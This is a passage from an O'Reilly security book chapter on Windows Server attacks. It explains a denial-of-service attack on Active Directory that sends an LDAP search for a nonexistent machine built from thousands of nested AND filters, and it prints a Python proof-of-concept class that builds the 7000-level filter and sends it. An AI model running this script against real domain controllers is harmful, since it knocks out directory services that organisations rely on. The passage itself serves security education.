Download Reference - Network Security Administrator/Specialist

“search request” to an Active Directory server. The “search request” must search for a
nonexistent machine within the Domain Controller to which you’ve previously bound.
It must be composed with more than 1000 AND statements but it is supposed that
OR, GE, LE and other binary operators will yield the same results.
Here’s the Python script Core provides in order to create such a request:
class ActiveDirectoryDOS( Ldap ):
def __init_ _(self):
self._s = None
self.host = '192.168.0.1'
self.basedn = 'dc=bugweek,dc=corelabs,dc=core-sdi,dc=com'
self.port = 389
self.buffer = ''
self.msg_id = 1
Ldap.__init_ _( )
def generateFilter_BinaryOp( self, filter ):
filterBuffer = asn1.OCTETSTRING(filter[1]).encode( ) +
asn1.OCTETSTRING(filter[2]).encode( )
filterBuffer = self.encapsulateHeader( filter[0], filterBuffer )
return filterBuffer
def generateFilter_RecursiveBinaryOp( self, filter, numTimes):
simpleBinOp = self.generateFilter_BinaryOp( filter )
filterBuffer = simpleBinOp
for cnt in range( 0, numTimes ):
filterBuffer = self.encapsulateHeader( self.LDAP_FILTER_AND,
filterBuffer + simpleBinOp )
return filterBuffer
def searchSub( self, filterBuffer ):
self.bindRequest( )
self.searchRequest( filterBuffer )
def run(self, host = '', basedn = '', name = '' ):
# the machine must not exist
machine_name = 'xaxax'
filterComputerNotInDir = (Ldap.LDAP_FILTER_EQUALITY,'name',machine_name)
# execute the anonymous query
print 'executing query'
filterBuffer = self.generateFilter_RecursiveBinaryOp(
filterComputerNotInDir, 7000 )
self.searchSub( filterBuffer )"
358
|
Chapter 14: Windows Server Attacks
This is the Title of the Book, eMatter Edition
Copyright © 2007 O’Reilly & Associates, Inc. All rights reserved.